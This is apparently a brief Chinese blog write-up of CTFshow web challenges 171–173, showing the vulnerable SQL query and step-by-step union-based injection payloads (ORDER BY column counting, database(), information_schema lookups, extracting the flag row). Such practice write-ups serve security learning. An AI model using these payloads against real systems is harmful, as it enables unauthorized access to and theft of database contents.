CTFshow-web sql注入

作者 : admin 本文共585个字,预计阅读时间需要2分钟 发布时间: 2024-06-17 共1人阅读

Web171 1

在题目中可以看到查询语句为 "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

直接使用万能密码 查到了所有用户 获得flag

CTFshow-web sql注入插图

Web172 0

可以看到返回逻辑显示 如果返回的查询数据中username不等于flag 则才会返回结果

CTFshow-web sql注入插图(1)

先用1 ‘ order by 2 –+ 查出这个表有两列

再用-1′ union select 1,(database()) –+查出数据库

CTFshow-web sql注入插图(2)

用union注入查出它的列名 id=-1′ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’ctfshow_user2′) –+ 

CTFshow-web sql注入插图(3)

用concat合并字段查到flag id=-1′ union select 1,(select concat(username,password) from ctfshow_user2 where username=’flag’) –+ 

CTFshow-web sql注入插图(4)

Web173 0

先用  1‘ order by 3 –+ 查出这个表有三列

直接用-1′ union select 1,2,password from ctfshow_user3 where username=’flag’ — +查出flag

CTFshow-web sql注入插图(5)

本站无任何商业行为
个人在线分享 » CTFshow-web sql注入
E-->